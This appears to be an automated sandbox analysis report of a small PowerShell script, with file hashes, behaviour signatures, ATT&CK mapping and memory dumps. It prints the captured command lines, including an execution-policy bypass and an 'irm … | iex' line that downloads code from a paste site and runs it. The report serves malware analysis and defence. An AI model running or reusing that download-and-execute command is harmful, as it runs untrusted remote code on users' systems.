8fa3b77007a27683e1e3c2e59d9c46aff40df0a9f486b5dc48686ec5e4dc29a9

Analysis

max time kernel
120s
max time network
128s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
07-07-2024 14:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.ps1
Size

47B
MD5

ba644fc1ec08acd03635e632eca767ce
SHA1

c43ff24b42307a56efe51fdcc90ba3f3688a83f5
SHA256

8fa3b77007a27683e1e3c2e59d9c46aff40df0a9f486b5dc48686ec5e4dc29a9
SHA512

5a0a21c01f379c82ace0cae841e83f250c0989055c4f97c1fe61374875ec618607f9184a86d77a6f1414adb55a4e560cf462e6087e49c9a72ab7ec05243f6386

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2216	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2216	powershell.exe
592	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	592	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 592	2216	powershell.exe	32
PID 2216 wrote to memory of 592	2216	powershell.exe	32
PID 2216 wrote to memory of 592	2216	powershell.exe	32

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "irm " "rentry.co/0x1001/raw | iex"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
93cd894f302c402de1037e3f8bf87c05

SHA1
bf03daa497a33f6810eef8bb5920b1b73e3c17c3

SHA256
c20149130c20f0e4e847db9e5851e1b9c43505ebdd10c8350cfbfe4fb3ffde73

SHA512
29e41ccc59714581f7c47085d81438c061bcfbfd273de4f64c715e0e3e9d0b175e5f1cf04addce4956674965f62490e2b9eccf5f1c30ea480330583a3218c6f2

Download Submit
memory/592-17-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/592-18-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-4-0x000007FEF615E000-0x000007FEF615F000-memory.dmp

Filesize
4KB

Download
memory/2216-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2216-6-0x0000000002920000-0x0000000002928000-memory.dmp

Filesize
32KB

Download
memory/2216-7-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-8-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-11-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-10-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-9-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download
memory/2216-19-0x000007FEF5EA0000-0x000007FEF683D000-memory.dmp

Filesize
9.6MB

Download